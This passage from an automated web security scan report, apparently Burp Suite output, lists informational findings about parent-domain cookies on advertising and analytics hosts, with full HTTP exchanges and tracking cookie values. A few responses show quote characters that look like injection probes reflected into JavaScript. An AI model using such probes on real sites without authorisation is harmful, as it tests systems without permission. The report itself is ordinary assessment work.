Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 12 Sep 2011 12:40:56 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 11-Sep-2013 12:40:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.6. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
10.7. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=594085&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.popsugar.com/community/welcome&t=Welcome&java=1&security=defbf778&sc_random=0.8725620578043163&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831680.0; expires=Sat, 10-Sep-2016 12:48:00 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;
10.8. http://c13.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c13.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1345764&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.nowpublic.com/&t=NowPublic.com%20%7C%20The%20News%20is%20NowPublic&java=1&security=26324a10&sc_random=0.533788861008361 HTTP/1.1
Host: c13.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315831702.0; expires=Sat, 10-Sep-2016 12:48:22 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;
10.9. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=14&q=&$=&s=2&z=0.5840262724086642 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1a0a560b687152eaa6ee3ef9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:1545,8,0:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:29:27:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236|1,1#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:53 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=165
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:48:53 GMT
Content-Length: 4602
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1a0a560b687
...[SNIP]...
10.10. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:31 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:31 GMT
Content-Length: 7450
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...
10.11. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7040/7039/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1638&z=0.628017297713086 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 507
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7040,15:305,7038,15:305,7038,0:0,7038,15:305,0,15:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:29:1:1:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7040,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=146
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1638;var zzPat='1a0a56
...[SNIP]...
10.12. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 407
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:305,0,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...
10.13. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 420
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=85
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='5406e''
...[SNIP]...
10.14. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.3701211323495954 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=3:3:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2470080B826,110235|0,1#0,24;expires=Wed, 12 Oct 2011 13:03:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:3:3:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 12 Sep 2011 13:06:33 GMT
Date: Mon, 12 Sep 2011 13:03:56 GMT
Content-Length: 4557
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCust
...[SNIP]...
10.15. http://c7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1201513Za1013066Zc305007038%2C305007038Zs608Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6687
Date: Mon, 12 Sep 2011 12:48:33 GMT
Connection: close


10.16. http://cm.npc-morris.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
10.17. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counters.gigya.com
